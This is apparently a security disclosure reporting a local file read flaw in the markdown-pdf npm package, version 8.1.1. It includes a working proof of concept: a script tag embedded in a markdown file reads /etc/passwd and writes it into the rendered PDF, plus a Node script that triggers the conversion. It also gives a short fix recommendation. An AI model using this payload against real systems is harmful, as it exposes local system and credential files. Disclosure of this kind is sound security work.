I would like to report local file reading
in markdown-pdf
It allows to insert a malicious html code, which allows to read the local files.
module name: markdown-pdfversion:8.1.1npm page: https://www.npmjs.com/package/markdown-pdf
Node module that converts Markdown files to PDFs.
The PDF looks great because it is styled by HTML5 Boilerplate. What? - Yes! Your Markdown is first converted to HTML, then pushed into the HTML5 Boilerplate index.html. Phantomjs renders the page and saves it to a PDF. You can even customise the style of the PDF by passing an optional path to your CSS and you can pre-process your markdown file before it is converted to a PDF by passing in a pre-processing function, for templating.
778 downloads in the last day
9,801 downloads in the last week
The markdown-pdf module allows you to convert markdown files to pdf. Due to insufficient filtration of the user input files, exist the possibility of inject a malicious html code.
test.md
with following content:# this is h1
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>
test.js
with following content:var markdownpdf = require("markdown-pdf"), fs = require("fs")
fs.createReadStream("test.md")
.pipe(markdownpdf())
.pipe(fs.createWriteStream("document.pdf"))
node test.js
document.pdf
in the same directoryUse html encode for encoding an user content, which not a markdown.
After converting the file, user can read a local file of system.